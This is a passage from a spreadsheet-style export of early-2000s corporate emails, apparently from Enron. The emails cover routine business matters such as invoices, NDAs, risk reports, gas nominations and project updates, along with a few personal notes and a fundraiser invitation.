_x000D_
Darrell_x000D_
_x000D_
PS I will bill you separately for my time (1.5 hours)_x000D_
and the time of Dr. Hoshino._x000D_
_x000D_
______________________________________________x000D_
Darrell Duffie_x000D_
mail  GSB Stanford CA 94305-5015 USA_x000D_
phone 650 723 1976_x000D_
fax   650 725 7979_x000D_
email duffie@stanford.edu_x000D_
web   http://www.stanford.edu/~duffie/_x000D_
______________________________________________x000D_
_x000D_
------------- End Forwarded Message -------------_x000D_
_x000D_
_x000D_
______________________________________________x000D_
Darrell Duffie_x000D_
mail  GSB Stanford CA 94305-5015 USA_x000D_
phone 650 723 1976_x000D_
fax   650 725 7979_x000D_
email duffie@stanford.edu_x000D_
web   http://www.stanford.edu/~duffie/_x000D_
______________________________________________x000D_
_x000D_
 - SAM_rev6.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 06:47:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeppnp@aol.com'})</t>
  </si>
  <si>
    <t>library times</t>
  </si>
  <si>
    <t>Today library is from 2:00 - 2:30.  I won't be there, see you later!  Jane</t>
  </si>
  <si>
    <t>Tue, 11 Jun 2002 12:37:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Goodell, Scott [mailto:Scott.Goodell@ubswenergy.com]_x000D_
Sent: Tuesday, June 11, 2002 2:23 PM_x000D_
To: Germany, Chris_x000D_
Subject: _x000D_
_x000D_
_x000D_
Here is the bible study stuff for next week._x000D_
 &lt;&lt;Bible study.doc&gt;&gt; _x000D_
_x000D_
_x000D_
Visit our energy trading website at http://www.ubswenergy.com or UBS Warburg's main website at http://www.ubswarburg.com_x000D_
_x000D_
This message contains confidential information and is intended only for the individual named.  If you are not the named addressee you should not disseminate, distribute or copy this e-mail.  Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system._x000D_
_x000D_
E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses.  The sender therefore does not accept liability for any errors or omissions in the contents of this message which arise as a result of e-mail transmission.  If verification is required please request a hard-copy version.  This message is provided for informational purposes and should not be construed as a solicitation or offer to buy or sell any securities or related financial instruments.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 01:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jhartmann@ercot.com'})</t>
  </si>
  <si>
    <t>frozenset({'ec@ercot.com'})</t>
  </si>
  <si>
    <t>Stage One Weather Alert issued for ERCOT</t>
  </si>
  <si>
    <t>Stage One Weather Alert issued for ERCOT. The_x000D_
Stage One Weather Alert was issued for_x000D_
ERCOT starting on 12/13/00 at 09:20. Notified all_x000D_
Control Area's via Hotline. The Northern_x000D_
half of the state is still below freezing with_x000D_
some accumulation of ice according to Weather_x000D_
information.</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 02:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'matthew.fleming@enron.com'})</t>
  </si>
  <si>
    <t>IF</t>
  </si>
  <si>
    <t>Ms.  Arnold called looking for the IF today.  She gets a much better response _x000D_
out of me than you do.</t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 12:52:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'greg.piper@enron.com', 'mark.pickering@enron.com', 'louise.kitchen@enron.com', 'john.lavorato@enron.com'})</t>
  </si>
  <si>
    <t>ENW - EA Contacts List</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached an Emergency Contact List for Enron Net Works - EA Operations and IT. _x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
If you find that any other revisions should be made, please advise.  _x000D_
_x000D_
NOTE: Revisions have been made as of 11/5/01.  _x000D_
_x000D_
_x000D_
Thank you, _x000D_
Heather Choate_x000D_
Asst. to Bob M. Hall_x000D_
Energy Operations_x000D_
Enron Net Works LLC_x000D_
(713) 853-3278_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 00:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colleen.sullivan@enron.com', 'jeff.westover@enron.com', 'dick.jenkins@enron.com', 'scott.neal@enron.com', 'bryce.baxter@enron.com', 'sandra.dial@enron.com'})</t>
  </si>
  <si>
    <t>CES Invoice</t>
  </si>
  <si>
    <t>Good news, even better when it happens.  My contract at CES, Brian Perrone, _x000D_
just told me CES will pay the invoice we billed them.  They still need to _x000D_
reconstruct January._x000D_
_x000D_
Billing_x000D_
I still need to work on January capacity and sales to CES._x000D_
I found a significant amount of transport I left out of January.  I want to _x000D_
fix the Feb capacity sheet and bill CES tomorrow or Fri for capacity and the _x000D_
scheduling fee._x000D_
The Feb invoicing should be much cleaner and ready to go out by the 10th.</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 03:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FLAG Telecom - Enron NDA</t>
  </si>
  <si>
    <t>How did it get to be that these people are drafting their own NDA's.  I _x000D_
thought our agreement when we met with Dovie Keptra was that I would draft _x000D_
them.  I would prefer every time not to have to figure out what they've _x000D_
changed. _x000D_
----- Forwarded by Tana Jones/HOU/ECT on 12/18/2000 11:57 AM -----_x000D_
_x000D_
	Peter Feltman@ENRON COMMUNICATIONS_x000D_
	12/18/2000 10:47 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Leslie Hansen/HOU/ECT@ECT, Mathis Conner/Enron Communications@Enron _x000D_
Communications_x000D_
		 Subject: FLAG Telecom - Enron NDA_x000D_
_x000D_
Attached for your review and comment please find the form of NDA that we _x000D_
intend to send to FLAG Telecom as soon as possible.  The attached is the same _x000D_
form as the Level 3 NDA distributed last week._x000D_
_x000D_
As we would like to send this out as early as possible, please call me at _x000D_
X54482 if you have any questions or comments._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Peter Feltman_x000D_
_x000D_
_x000D_
_x000D_
Peter Feltman_x000D_
Director_x000D_
E-Market Services_x000D_
Enron Net Works LLC_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
_x000D_
T: 713-345-4482_x000D_
X: 713-646-8583_x000D_
C: 713-594-4009</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 07:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kpanus@integra-ls.com'})</t>
  </si>
  <si>
    <t>colovista is good with me, late may is good.brad</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tracey.irvin@enron.com'})</t>
  </si>
  <si>
    <t>Hartmann AG</t>
  </si>
  <si>
    <t>Tracy,_x000D_
_x000D_
Please note the following addition to the EIM credit reserve:_x000D_
_x000D_
Counterparty:   Paul Hartmann AG_x000D_
Deal No:  QD5697.1_x000D_
Deal Date:  December 1, 2000_x000D_
Originator:  Tom Bruce-Jones_x000D_
Amount:  $85,000_x000D_
_x000D_
The reserve covers a five year pulp swap wherein ENA pays $582 and receives _x000D_
FOEX._x000D_
_x000D_
Please call if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Tanya</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2001 13:37:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sandra.lighthill@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
FYI -- see what you can find out about this -- perfect opportunity to market OLER's services.  Thanks  MHC_x000D_
 -----Original Message-----_x000D_
From: 	Bland Jr., Ted C.  _x000D_
Sent:	Wednesday, July 18, 2001 5:59 PM_x000D_
To:	Oxley, David; Jones, Robert W.- HR Exec; Pieper, Kalen; Barnard, Marla; Smith, Gary; Walton, Sheila; Gilchrist, Scott; Olson, Cindy; Yowman, Andrea; Donahue, Jeff; Long, Sean; McDaniel, Kirk; Shankman, Jeffrey A.; Taylor, Mitch; Cash, Michelle; Beck, Sally; Colwell, Wes; Shoaf, Kimberly; Lemmons Jr., Billy; Warner, Traci; Davies, Neil; Slone, Jeanie; Melodick, Kim; Funkhouser, Shanna; Hill, Dave (HR); Seleznov, Ryan; McLoughlin, Hector; Brown, Daniel; Evanson, Meliza; Kerr, Vanessa; Buckley, Karen; Kean, Steven; McVicker, Maureen_x000D_
Subject:	_x000D_
_x000D_
As many of you know, Enron is an active participant in the National Black MBA convention.  The national convention is slated to be held in Orlando, Florida the week of September 24th.  Please be advised that Kimberly Shoaf, the Analyst and Associate Diversity recruiter will be leading this effort for Enron.  Please direct any inquiries concerning the convention to Kimberly who can be reached at extension 5-1580.  Sally Beck and Jeff Shankman have agreed to be the executive sposors for the convention and Neil Davies and me will be the project leads on this effort (we can be reached at 3-7229 and 3-5275 respectively).  Thank you for your participation and we are looking forward to a successful convention.  Ted</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 09:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>JCC forward curve</t>
  </si>
  <si>
    <t xml:space="preserve"> The following spreadsheet contains a simple way to build a JCC forward _x000D_
curve.  It is based upon the spread between JCC and Brent lagged one month.   _x000D_
_x000D_
 I'm out until the 2nd._x000D_
_x000D_
-Kevin K._x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:15:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Williams</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the info._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Perlingiere, Debra  _x000D_
Sent:	Thursday, October 25, 2001 5:58 PM_x000D_
To:	Osire, Ann; Wallumrod, Ellen; Dickson, Stacy E._x000D_
Subject:	Williams_x000D_
_x000D_
_x000D_
 My contacts are:  Tim Neuman (credit dept.)  @ 918-573-4880 and Kelly Knowlton (senior ng analyst) @ 918-573-5278_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
Debra.Perlingiere@enron.com_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 12:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kirstee.hewitt@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'cantekin.dincerler@enron.com', 'grant.masson@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>VaR for COB 1st Aug 2000</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have run the VaR for COB 1st Aug 2000. A summary of the results is as _x000D_
follows :_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I have also attached the model._x000D_
_x000D_
Again the prices for Cocoa Beans and Gold have not been updated since the _x000D_
26th July. The gamma positions for the metals have been _x000D_
added to check the effect on the VaR. The change  was small :_x000D_
Delta VaR - $4,899,196_x000D_
Delta/Gamma VaR - $4,780,797_x000D_
This is not a live daily feed as Andreas mannually created the file for me _x000D_
today so that we could do this check._x000D_
_x000D_
Regards_x000D_
Kirstee</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 08:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maritta.mullet@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'david.bush@enron.com', 'anita.luong@enron.com', 'lee.papayoti@enron.com', 'kerry.roper@enron.com', 'paul.fox@enron.com', 'james.prentice@enron.com', 'sally.shuler@enron.com', 'gregg.lenart@enron.com', 'michael.mitcham@enron.com', 'mark.diedrich@enron.com', 'steven.elliott@enron.com', 'robert.lee@enron.com', 'daren.farmer@enron.com', 'david.johnson@enron.com', 'john.nowlan@enron.com', 'thomas.meers@enron.com'})</t>
  </si>
  <si>
    <t>NATURAL GAS NOMINATION FOR DECEMBER 2000</t>
  </si>
  <si>
    <t>Enron Methanol nominates the following natural gas requirements for the _x000D_
Methanol Plant for December 2000:_x000D_
_x000D_
33,000 mmbtu per day_x000D_
_x000D_
_x000D_
EGPFC nominates the following natural gas requirements for the MTBE Plant at _x000D_
Morgan's Point for December 2000: _x000D_
_x000D_
12,000 mmbtu per day for the first 15 days of the month.  None for the last _x000D_
half of the month.  MTBE plant will be down after December 15.</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 03:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jason.wolfe@enron.com', 'patrick.ryder@enron.com', 'cgiron@mindspring.com', "ryan.o'rourke@enron.com", 'phillip.love@enron.com', 'dawn.kenne@enron.com', 'smmayers@earthlink.net', 'kristi.giron@cfisd.net', 'kevin.bosse@enron.com', 'hollyw@email.msn.com', 'kwpope@pdq.net', 'kyle.lilly@enron.com'})</t>
  </si>
  <si>
    <t>Navy</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 02/16/2001 _x000D_
11:48 AM ---------------------------_x000D_
_x000D_
_x000D_
"Brent Wallace" &lt;bwallace@zahrsecurities.com&gt; on 02/16/2001 11:31:27 AM_x000D_
Please respond to &lt;bwallace@zahrsecurities.com&gt;_x000D_
To: "Chris Cooper \(E-mail\)" &lt;chris@savatech.com&gt;, "Darron. C. Giron _x000D_
\(E-mail\)" &lt;Darron.C.Giron@enron.com&gt;, &lt;LVela@aol.com&gt;, _x000D_
&lt;melinda@federalflange.com&gt;, &lt;doug@cont-casing.com&gt;, &lt;greg@amveco.com&gt;_x000D_
cc: &lt;dinoscar@mail.swbell.net&gt; _x000D_
Subject: Navy_x000D_
_x000D_
_x000D_
 _x000D_
 - 15call.jpg_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.joyce@enron.com'})</t>
  </si>
  <si>
    <t>Electrobolt S&amp;S Scope</t>
  </si>
  <si>
    <t xml:space="preserve">Kay,_x000D_
 Attached is the LM 6000 and options scope that ESA has prepared, that will _x000D_
be input to our MOU.  It does not reflect the scope of equipment that will be _x000D_
procured from ABB yet; this should be forthcoming.  Also below is the current _x000D_
cost estimate of the machines with their S&amp;S options and the ABB scope.  _x000D_
Please let us know what other information regarding scope that you might _x000D_
need.  _x000D_
_x000D_
Thanks,_x000D_
Kevin_x000D_
---------------------- Forwarded by Kevin Joyce/Corp/Enron on 08/25/2000 _x000D_
09:26 AM ---------------------------_x000D_
From: John R Ayres on 08/24/2000 01:35 PM_x000D_
To: Chris Booth/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Brett R Wiggs/SA/Enron@Enron, Kevin Joyce/Corp/Enron@Enron, Glauco _x000D_
Palhoto/SA/Enron@Enron, Gerald L Gobbi/NA/Enron@Enron _x000D_
_x000D_
Subject: Total Electrobolt S&amp;S Scope_x000D_
_x000D_
Chris, attached is the total scope to S&amp;S.  From this list you should be able _x000D_
to make your change order to S&amp;S base on purchased quantities versus required _x000D_
quantities.  I have provided you the required quantities.  _x000D_
I provided you a column for the delta cost to S&amp;S.  When you are finished, _x000D_
please complete the spreadsheet for all of our records.  I do not know how we _x000D_
are to add cost for storage either._x000D_
Thanks,_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
From: John R Ayres on 08/23/2000 12:38 PM_x000D_
To: Kevin Joyce/Corp/Enron@Enron_x000D_
cc: Brett R Wiggs/SA/Enron@Enron _x000D_
_x000D_
Subject: S&amp;S (GE) Scope of Supply Cost_x000D_
_x000D_
Here are the total cost for the S&amp;S scope of supply for the Electrobolt _x000D_
Project.  I have not included any ENA burdens or storage cost.  These cost _x000D_
are from purchase order with ENA to S&amp;S._x000D_
                                                                              _x000D_
                                                                              _x000D_
     EIGHT MACHINES               EACH_x000D_
The total cost of the LM 6000's, sprint package, water injection _x000D_
skid                = $112,855,600  or $14,106,950 each_x000D_
The total cost of options (chillers stacks, cooling tower, mod. buildings, _x000D_
etc. =     13,309,400  or      1,663,675 each_x000D_
                                                                              _x000D_
                                               Totals                = $ _x000D_
126,165,000 or   $15,770,625 each_x000D_
_x000D_
The transformers from ABB in Brazil should cost $3,200,000. total in Brazil _x000D_
without shipping to the site.     _x000D_
_x000D_
Hope this helps you with the WLB bucket._x000D_
John </t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 04:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Heather,_x000D_
_x000D_
The confidentiality agreement signed by Enron/Vepco states as follows:_x000D_
_x000D_
Except as required by law, neither party hereto nor their representatives _x000D_
will disclose to any person either the fact that discussions or negotiations _x000D_
are taking place between them not any terms, conditions or other fact with _x000D_
respect to any transaction that may be proposed or undertaken, including the _x000D_
status thereof._x000D_
  _x000D_
-------------------------------------------------------------_x000D_
_x000D_
We can loosen up the terms in the contract so that we can disclose certain _x000D_
terms to potential investors (I'll make that change), or we can discuss _x000D_
amending this agreement.  Additionally, it looks like we have the testimony _x000D_
and application filed with the Public Staff to work with._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Feb 2000 11:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dick_smith@csufresno.edu', 'dirk.vanulden@enron.com', 'jeff.dasovich@enron.com', 'dustin.smith@enron.com', 'andrew.wu@enron.com', 'richard.crevelt@enron.com'})</t>
  </si>
  <si>
    <t>CSU Fresno 115kV Substation Status</t>
  </si>
  <si>
    <t>Team_x000D_
_x000D_
Listed below is a brief description on the status for the Project._x000D_
_x000D_
? EIP Associates is currently working on the CEQA Initial Draft Study.  The _x000D_
draft will be complete on February 11th, 2000.  At this point it will be in _x000D_
our hands for review and comment.  I have scheduled for our review period to _x000D_
take no longer than one week.  So please be prepared, the Study will be _x000D_
coming to you on February 14th.  I want to get this Study out to public _x000D_
review ASAP!_x000D_
? EES will be sending out an Request for Proposal (RFP) to three contractors _x000D_
this week to obtain costs to compare to the PG&amp;E numbers received in their _x000D_
Detailed Study.  The RFP will contain various sketches and documents _x000D_
detailing the following scopes of work.  The overbuilding of the existing _x000D_
12kV line to accommodate a 115kV circuit from the PG&amp;E Herndon - Bullard Sub. _x000D_
to the new CSUF Sub.  The installation of an underground 115kV circuit from _x000D_
the PG&amp;E Herndon - Bullard Sub. to the new CSUF Sub.  The yard work at the _x000D_
PG&amp;E Herndon - Bullard Sub._x000D_
? Developing a strategy for the upcoming meeting with PG&amp;E to go over the _x000D_
Detailed Study.  I am shooting for this meeting to take place during the last _x000D_
week of February.  I will be working with all of you in the mean time to make _x000D_
sure all bases are covered and that a correct, thorough agenda is developed._x000D_
_x000D_
I hope this gives everyone an idea of where we stand.  Feel free to call or _x000D_
respond back with any questions or comments._x000D_
_x000D_
_x000D_
_x000D_
Rob Cone_x000D_
_x000D_
Project Manager_x000D_
Enron Energy Services_x000D_
12647 Alcosta Blvd., Suite 500_x000D_
San Ramon, CA 94583_x000D_
Ph:925.543.3701, Fax:925.543.3550_x000D_
Pager:888.397.5826</t>
  </si>
  <si>
    <t>meeting still going? jeff</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'legal.2@enron.com'})</t>
  </si>
  <si>
    <t>Enron PATS 2000-1: Revised Documents</t>
  </si>
  <si>
    <t xml:space="preserve">please print from SWAP 1 to the end.  Thanks.  SS_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 06/12/2000 10:22 AM -----_x000D_
_x000D_
	Joyce Dorsey_x000D_
	06/12/2000 09:27 AM_x000D_
		 _x000D_
		 To: rastin@velaw.com, Gareth Bahlmann/HOU/ECT@ECT, Clint _x000D_
Freeland/Corp/Enron@Enron, Paige B Grumulaitis/HOU/ECT@ECT, who@velaw.com, _x000D_
Johnna Kokenge/Corp/Enron@ENRON, jlynch@velaw.com, Jeff Nogid/HOU/ECT@ECT, _x000D_
kimberly.r.scardino@arthurandersen.com, Sara Shackleton/HOU/ECT@ECT, Pushkar _x000D_
Shahi/HOU/ECT@ECT, Ryan Siurek/Corp/Enron@ENRON, William Stuart/HOU/ECT@ECT, _x000D_
AnnMarie Tiller/Corp/Enron@ENRON, Brent Vasconcellos/Corp/Enron@ENRON, Brenda _x000D_
L Funk/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Enron PATS 2000-1: Revised Documents_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Joyce Dorsey/HOU/ECT on 06/12/2000 09:26 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Clint Freeland@ENRON_x000D_
06/12/2000 08:40 AM_x000D_
To: Joyce Dorsey/HOU/ECT@ECT_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Enron PATS 2000-1: Revised Documents_x000D_
_x000D_
Joyce -_x000D_
Would you please forward this to the Sterling PAT team.  Thank you._x000D_
CF_x000D_
---------------------- Forwarded by Clint Freeland/Corp/Enron on 06/12/2000 _x000D_
08:24 AM ---------------------------_x000D_
_x000D_
_x000D_
mukunah@winstim.com on 06/09/2000 09:56:13 PM_x000D_
To: clint.freeland@enron.com, gareth.bahlmann@enron.com, _x000D_
kimberly.blue@ubsw.com, scott.whitney@ubsw.com, ryan.donovan@ubsw.com, _x000D_
scott.giese@ubsw.com, timothy.steele@ubsw.com, michael.davidson@ubsw.com, _x000D_
william.sullivan@ubsw.com, john.magovern@ubsw.com, raustin@houston.rr.com, _x000D_
mspradling@velaw.com, sara.shackleton@enron.com, who@velaw.com, _x000D_
gorloff@bracepatt.com, ktrautner@bracepatt.com, Rastin@velaw.com, _x000D_
ttabor@bankofny.com, kurzw@winstim.com, bergeronc@winstim.com, _x000D_
david.mikula@ubsw.com, bvascon@enron.com, atiller@enron.com, jlynch@velaw.com_x000D_
cc: ecklandt@winstim.com, delaneyj@winstim.com, chudyj@winstim.com, _x000D_
earlyhud@winstim.com _x000D_
_x000D_
Subject: Enron PATS 2000-1: Revised Documents_x000D_
_x000D_
_x000D_
In connection with Enron's PATS offering, we're attaching a Cover Letter and_x000D_
clean and marked drafts of the Purchase Agreement, Remarketing Agreement, _x000D_
Trust_x000D_
Agreement  and Confirmations relating to the swaps and options._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Hazel Mukuna_x000D_
_x000D_
(See attached file: Cover Letter.doc)_x000D_
_x000D_
(See attached file: Purchase Agreement.doc)        (See attached file: _x000D_
Purchase_x000D_
Agreement REDLINE.doc)_x000D_
_x000D_
(See attached file: Remarketing Agreement.doc)     (See attached file:_x000D_
Remarketing Agreement.REDLINE.doc)_x000D_
_x000D_
(See attached file: Trust Agreement.doc)           (See attached file: Trust_x000D_
Agreement.REDLINE.doc)_x000D_
_x000D_
(See attached file: Swap 1 - UBS and Trust.doc)    (See attached file: Swap 1 _x000D_
-_x000D_
UBS and Trust.REDLINE.doc)_x000D_
_x000D_
_x000D_
(See attached file: Swap 2 - Enron - UBS.doc)      (See attached file: Swap 2 _x000D_
-_x000D_
Enron - UBS.REDLINE.doc)_x000D_
_x000D_
(See attached file: Swap 3 - Enron - UBS.doc)      (See attached file: Swap 3 _x000D_
-_x000D_
Enron - UBS.REDLINE.doc)_x000D_
_x000D_
(See attached file: Option 1 - UBS and Trust.doc)  (See attached file: Call_x000D_
Option 1 - UBS and Trust.REDLINE.doc)_x000D_
_x000D_
(See attached file: Option 2 - Enron and UBS.doc)  (See attached file: Option _x000D_
2_x000D_
- Enron and UBS.REDLINE.doc)_x000D_
_x000D_
_x000D_
_______________________________________x000D_
This message, together with any attachments, is intended only for the_x000D_
use of the individual or entity to which it is addressed and may contain_x000D_
information that is legally privileged, confidential and exempt from_x000D_
disclosure.  If you are not the intended recipient, you are hereby_x000D_
notified that any dissemination, distribution, or copying of this_x000D_
message,or any attachment, is strictly prohibited.  If you have received_x000D_
this message in error, please notify the original sender (or the WSPR_x000D_
Help Desk) immediately by telephone (212-858-1000) or by return_x000D_
E-mail and delete the message, along with any attachments, from_x000D_
your computer.  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Cover Letter.doc_x000D_
 - Purchase Agreement.doc_x000D_
 - Purchase Agreement REDLINE.doc_x000D_
 - Remarketing Agreement.doc_x000D_
 - Remarketing Agreement.REDLINE.doc_x000D_
 - Trust Agreement.doc_x000D_
 - Trust Agreement.REDLINE.doc_x000D_
 - Swap 1 - UBS and Trust.doc_x000D_
 - Swap 1 - UBS and Trust.REDLINE.doc_x000D_
 - Swap 2 - Enron - UBS.doc_x000D_
 - Swap 2 - Enron - UBS.REDLINE.doc_x000D_
 - Swap 3 - Enron - UBS.doc_x000D_
 - Swap 3 - Enron - UBS.REDLINE.doc_x000D_
 - Option 1 - UBS and Trust.doc_x000D_
 - Call Option 1 - UBS and Trust.REDLINE.doc_x000D_
 - Option 2 - Enron and UBS.doc_x000D_
 - Option 2 - Enron and UBS.REDLINE.doc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 10:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Contract update</t>
  </si>
  <si>
    <t xml:space="preserve">Vince, if there are some differences that we need to correct, you and I can _x000D_
meet tomorrow when you bring the contract in. I am available anytime after _x000D_
lunch.  Please call me at X30649._x000D_
_x000D_
Sheila _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Kaminski, Vince  _x000D_
Sent: Tuesday, March 06, 2001 3:10 PM_x000D_
To: Sheila Walton/HOU/ECT@ENRON_x000D_
Cc: Kaminski, Vince_x000D_
Subject: Contract update_x000D_
_x000D_
Sheila,_x000D_
_x000D_
Some minor differences between the draft and the final executed version._x000D_
I have forgotten to bring the draft today, I shall send  a copy to you _x000D_
tomorrow._x000D_
There were some hand-written changes made by Greg ijn the draft that were not _x000D_
transferred to_x000D_
the final version._x000D_
_x000D_
Vince_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 07:20:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Pacific Gas &amp; Electric Company</t>
  </si>
  <si>
    <t>_x000D_
Bill_x000D_
_x000D_
Are you talking to PG&amp;E about post petition power invoice?  I understand the Canadian receivable post petition was paid.  Is that right?  Give me a call when you get a chance._x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Reeves, Leslie  _x000D_
Sent:	Wednesday, September 12, 2001 9:09 AM_x000D_
To:	Sager, Elizabeth_x000D_
Subject:	FW: Pacific Gas &amp; Electric Company_x000D_
_x000D_
Elizabeth - This is the latest information we have regarding the EPMI invoice.  Please let me know if you need us to do anything further._x000D_
_x000D_
Thanks,_x000D_
Leslie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ratnala, Melissa K.  _x000D_
Sent:	Wednesday, September 12, 2001 8:55 AM_x000D_
To:	Reeves, Leslie_x000D_
Cc:	Quarles, Daphne_x000D_
Subject:	FW: Pacific Gas &amp; Electric Company_x000D_
_x000D_
Leslie, _x000D_
Daphne continued to follow-up on the below invoice and PG&amp;E's response is below...Please let me know if to your knowledge, this is accurate information._x000D_
Thanks, Melissa_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Quarles, Daphne  _x000D_
Sent:	Wednesday, September 12, 2001 7:57 AM_x000D_
To:	Ratnala, Melissa K._x000D_
Subject:	Pacific Gas &amp; Electric Company_x000D_
_x000D_
Melissa,_x000D_
_x000D_
On yesterday, Bob Caden and Dave Cena called and left messages about invoice #NTP010905.  They both said that this invoice is tied up with other invoices that are currently being discussed with Bill Bradford.  They both suggested that you give Bill Bradford a call.  Also, Dave Cena said that if you would like to speak to someone at PG&amp;E, you can give him a call at (415) 973-4144._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 12:24:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lbecker@gilbaneco.com'})</t>
  </si>
  <si>
    <t>frozenset({'lisabeckertx@hotmail.com'})</t>
  </si>
  <si>
    <t>Michael Berry Reception</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Lisa Barry Becker, Freddie Bustillo, Gloria Bustillo, Ric Campo_x000D_
Hector H. Cardenas Jr., Morton Cohn, Roland Garcia, Willard Jackson_x000D_
Pat Kiley, Marshal Lightman, Victoria Lightman, Jack Linville_x000D_
Joseph Massa, Michael Massa, Robin Mueck, John Ros_x000D_
Sonia Soto, Mike Surface, Tony Vallone, Massey Villarreal_x000D_
James Walke, and Ed Wulfe_x000D_
_x000D_
Invite you to a fundraiser for Michael Berry for Houston City Council_x000D_
At-Large #4_x000D_
(the open seat being vacated by Chris Bell)_x000D_
_x000D_
at the art-filled home of Marshal &amp; Victoria Lightman,_x000D_
 a three-story metal house in the West End, designed by architect_x000D_
Natalye Appel._x000D_
5203 Gibson_x000D_
_x000D_
Monday, October 15, 2001_x000D_
5:30 p.m.-8:00 p.m._x000D_
Open Bar &amp; Heavy Hors d'oeuvres (Vallone's &amp; Mass's Seafood Restaurant)_x000D_
_x000D_
_x000D_
Contribution Levels_x000D_
			$5,000 Gold      	$1,000 Bronze  	$250_x000D_
Supporter_x000D_
			$2,500 Silver     	$500 Friend_x000D_
$100 Backer  	$50 Young Backer_x000D_
_x000D_
_x000D_
_x000D_
Please RSVP by fax to 713-522-3286, e-mail to sonia_soto@yahoo.com or_x000D_
phone 713-209-1827._x000D_
_x000D_
For more information about the  Michael Berry campaign please log on to_x000D_
www.michaelberry.com_x000D_
_x000D_
Directions: from downtown go west on Allen Parkway. Turn north on S._x000D_
Shepherd.  Turn left on Gibson go a few blocks to 5203 Gibson. (between_x000D_
Allen Parkway and Washington)_x000D_
_x000D_
_x000D_
Name:______________________________________________________x000D_
Company: ___________________________________________________x000D_
